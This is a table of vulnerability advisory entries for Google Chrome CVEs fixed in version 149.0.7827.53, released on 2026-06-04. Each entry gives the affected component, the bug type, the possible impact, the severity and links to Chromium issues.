| Google--Chrome | Inappropriate implementation in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10966 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511713779 |
| Google--Chrome | Use after free in SurfaceCapture in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10967 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511714900 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10968 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511758373 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10969 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511765713 |
| Google--Chrome | Insufficient validation of untrusted input in InterestGroups in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10970 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/512772489 |
| Google--Chrome | Insufficient validation of untrusted input in Printing in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10971 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513005991 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10972 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513006660 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10973 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513042859 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10974 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513135862 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10975 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513154132 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10976 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513249847 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10977 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513340227 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10978 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513394258 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10979 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513468021 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10980 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513713927 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted video file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10981 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513762354 |
| Google--Chrome | Use after free in WebXR in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10982 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513774197 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10983 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513947609 |
| Google--Chrome | Inappropriate implementation in Accessibility in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10984 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514022635 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10985 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514082801 |
| Google--Chrome | Integer overflow in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10986 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514744613 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10987 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/515431687 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10988 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/515465685 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10989 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516311623 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10990 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506311914 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10991 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503553614 |
| Google--Chrome | Insufficient data validation in Animation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10992 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493534964 |
| Google--Chrome | Heap buffer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10993 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504160794 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10994 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504820809 |
| Google--Chrome | Heap buffer overflow in TabStrip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10995 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505371980 |
| Google--Chrome | Inappropriate implementation in Workers in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10996 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/40051700 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass discretionary access control via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10997 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/464217867 |
| Google--Chrome | Out of bounds read in Media in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to perform an out of bounds memory read via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10998 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/486536242 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10999 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489369089 |
| Google--Chrome | Use after free in Fonts in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11000 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492374380 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11001 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493691489 |
| Google--Chrome | Use after free in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11002 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494740162 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11003 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494823867 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11004 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494823889 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11005 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495052581 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11006 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495489174 |
| Google--Chrome | Insufficient validation of untrusted input in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11007 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495834228 |
| Google--Chrome | Insufficient validation of untrusted input in WebAppInstalls in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11008 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495864099 |
| Google--Chrome | Use after free in USB in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11009 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496233132 |
| Google--Chrome | Use after free in WebShare in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11010 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496266444 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11011 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496702621 |
| Google--Chrome | Use after free in Serial in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11012 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497000161 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11013 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497056412 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass site isolation via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11014 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497058611 |
| Google--Chrome | Out of bounds read in WebGPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11015 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497183443 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11016 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497278395 |
| Google--Chrome | Inappropriate implementation in Link Preview in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11017 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497336872 |
| Google--Chrome | Insufficient policy enforcement in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11018 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497342466 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11019 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497344640 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11020 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497440270 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11021 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497487755 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11022 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497532918 |
| Google--Chrome | Inappropriate implementation in WebAppInstalls in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11023 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497538899 |
| Google--Chrome | Stack buffer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11024 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497591594 |
| Google--Chrome | Insufficient policy enforcement in Navigation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11025 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497595264 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11026 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497599683 |
| Google--Chrome | Insufficient validation of untrusted input in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11027 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497604407 |
| Google--Chrome | Use after free in Media in Google Chrome on Linux and ChromeOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11028 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497627277 |
| Google--Chrome | Insufficient validation of untrusted input in Drag and Drop in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11029 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497651688 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11030 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497722502 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11031 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497748760 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11032 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497831111 |
| Google--Chrome | Uninitialized Use in WebML in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11033 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497926664 |
| Google--Chrome | Insufficient validation of untrusted input in Tab Group Sync in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11034 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497934980 |
| Google--Chrome | Inappropriate implementation in Custom Tabs in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11035 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497936421 |
| Google--Chrome | Inappropriate implementation in DOM in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11036 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497964917 |
| Google--Chrome | Out of bounds write in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11037 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497971287 |
| Google--Chrome | Insufficient policy enforcement in Subresource Integrity in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11038 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498080391 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11039 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498204112 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11040 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498371085 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11041 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498700369 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11042 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498720094 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11043 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498721316 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11044 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498724803 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11045 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498727111 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11046 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498728857 |
| Google--Chrome | Inappropriate implementation in Base in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11047 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498768132 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass same origin policy via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11048 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498808432 |
| Google--Chrome | Use after free in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11049 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498815068 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11050 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498818402 |
